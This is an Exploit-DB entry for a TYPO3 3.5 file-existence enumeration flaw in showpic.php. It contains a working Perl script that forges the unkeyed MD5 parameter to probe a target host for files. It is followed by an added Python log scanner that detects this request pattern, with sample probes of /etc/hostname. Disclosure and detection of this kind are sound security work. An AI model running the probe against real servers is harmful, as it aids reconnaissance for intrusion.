Exploit Typo3 3.5 b5 - 'showpic.php' File Enumeration

Exploiter

18 Dec 2022
EDB-ID: 22297
EDB verification: Passed
Author: MARTIN EISZNER
Vulnerability type: WEBAPPS
Platform: PHP
CVE: N/A
Publication date: 2003-02-28
Code:
source: https://www.securityfocus.com/bid/6982/info

TYPO3 is prone to a vulnerability that will allow remote attackers to enumerate whether or not files exist on the system hosting the software. This issue exists in the 'showpic.php' and 'thumbs.php' scripts. This type of information may be useful in mounting further attacks against the host system. 

#!/usr/bin/perl
# Arguments: <host> <file path to test>
use LWP::UserAgent;
use HTTP::Request;
use HTTP::Response;
use Digest::MD5 qw(md5_hex);
($ho,$fi) = @ARGV;
# The md5 parameter is just the MD5 of the file name followed by "||||"; no secret is involved
$md5 = md5_hex("$fi||||");
$ua = LWP::UserAgent->new();
$ua->agent("Opera 6.0");
$uri = "http://".$ho."/typo3/showpic.php?file=$fi&md5=$md5";
$req = HTTP::Request->new("GET",$uri);
$res = $ua->request($req);
# The response text differs for missing files, which reveals whether the file exists
if ($res->content !~ /was not found/ && $res->content !~ /No valid/) {print "\n$fi exists\n";}
else {print "\n$fi not found\n";}
 
Source
www.exploit-db.com
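
A defender-side check for the request pattern in the script above, as an added example that is not part of the original post or the Exploit-DB entry: it scans web access logs for showpic.php requests whose md5 parameter equals the unkeyed MD5 of the file name followed by "||||". The common log format, the sample lines, the function names and the assumption that legitimate image links carry size parameters (and therefore a different hash) are assumptions.

```python
import hashlib
import re
from collections import defaultdict
from urllib.parse import urlsplit, parse_qs

# Client address and request target from a common/combined log format line.
REQUEST = re.compile(r'^(\S+) .*?"(?:GET|HEAD) (\S+) HTTP/[\d.]+"')

def unkeyed_md5(path):
    # Same value the script on this page sends: MD5 of the file name
    # followed by "||||", computed without any server-side secret.
    return hashlib.md5((path + "||||").encode()).hexdigest()

def find_enumeration(lines):
    """Return {client: sorted probed paths} for requests matching the pattern."""
    probes = defaultdict(set)
    for line in lines:
        m = REQUEST.match(line)
        if not m:
            continue
        client, target = m.groups()
        url = urlsplit(target)
        if not url.path.endswith("/showpic.php"):
            continue
        query = parse_qs(url.query, keep_blank_values=True)
        path = query.get("file", [""])[0]
        digest = query.get("md5", [""])[0].lower()
        # Assumption: a hash over the bare file name marks a hand-built request.
        if path and digest == unkeyed_md5(path):
            probes[client].add(path)
    return {client: sorted(paths) for client, paths in probes.items()}

def sample_line(ip, query):
    # Builds one constructed log line for the sample below.
    return (f'{ip} - - [28/Feb/2003:10:00:00 +0000] '
            f'"GET /typo3/showpic.php?{query} HTTP/1.0" 200 312')

# Constructed sample log (documentation-range addresses, not real traffic).
SAMPLE = [
    sample_line("192.0.2.10", "file=uploads/pics/logo.gif&width=400&height=300&md5=" + "0" * 32),
    sample_line("198.51.100.7", "file=/etc/hostname&md5=" + unkeyed_md5("/etc/hostname")),
    sample_line("198.51.100.7", "file=/var/log/example.log&md5=" + unkeyed_md5("/var/log/example.log")),
    '203.0.113.5 - - [28/Feb/2003:10:00:02 +0000] "GET /index.php HTTP/1.0" 200 900',
]

if __name__ == "__main__":
    for client, paths in find_enumeration(SAMPLE).items():
        print(client, "probed", len(paths), "path(s):", ", ".join(paths))
```

A client that accumulates many distinct paths in the result is the signal to review; a single match can also come from a legitimate link that has no size parameters.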
